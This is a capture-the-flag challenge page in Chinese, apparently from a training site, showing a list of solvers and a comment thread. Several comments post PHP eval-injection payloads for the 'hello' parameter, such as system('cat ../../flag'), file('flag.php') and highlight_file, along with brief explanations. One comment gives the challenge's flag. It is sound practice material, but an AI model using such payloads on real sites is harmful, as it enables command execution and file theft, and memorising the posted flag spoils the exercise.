评分(10)
解题动态
柒柒77 攻破了该题 16分钟前
zz0607 攻破了该题 19分钟前
gongyy 攻破了该题 48分钟前
巴咕噜182 攻破了该题 2小时前
SurPLus007 攻破了该题 2小时前
zhaowenxin 攻破了该题 7小时前
yang0000 攻破了该题 16小时前
Biscuitvv 攻破了该题 16小时前
香蕉君 攻破了该题 19小时前
四叠半神话大系 攻破了该题 21小时前
lnboxue 攻破了该题 21小时前
chi 攻破了该题 22小时前
aboic 攻破了该题 1天前
youbug 攻破了该题 1天前
YYYYHHHHNNNN 攻破了该题 1天前
lance 攻破了该题 1天前
彭彭 攻破了该题 1天前
qwaeawd 攻破了该题 1天前
zzuer 攻破了该题 1天前
评论
anguilin 3年前
举报
http://114.67.175.224:18361/?hello=system(%27cat%20../../../../../../../../flag%27)简单
acela 3年前
举报
flag{932241d0a39e2c7a1fe31a9a7dd89594};
wenroudeyanhuo 3年前
举报
please input a?
aoikuuun 3年前
举报
/?hello=system("tail%20-n%202%20flag.php")
GH0S7 3年前
举报
我真棒
K463726543 3年前
举报
hello=highlight_file('./flag.php') highlight_file() 使用highlight()函数能在编译器编译后能显示出文件源代码,并且在浏览器中打开时也能显示源代码。
SecI302 3年前
举报
踩坑了用这个file_get_contents(“/flag”); 读了半天都是只显示长度没有内容
Cat00011cat 3年前
举报
http://114.67.175.224:10794/?hello=file(%27flag.php%27)
musewithwind 3年前
举报
@D4C 构造php函数,看代码,vardump函数用于打印变量信息,file函数获取的是flag.php源文件,此时使用vardump打印即是包括注释的flag.php源代码,flag就出来了
D4C 3年前
举报
大佬能不能给小白讲讲原理啊
小王爱吃螺蛳粉 3年前
举报
有eval可能有命令提交漏洞,知道本题引用了“flag.php”,便可以通过file函数将eval("var_dump($a);")就是把$a的内容打印出来
风灵丨玉秀 3年前
举报
/?hello="flag.php"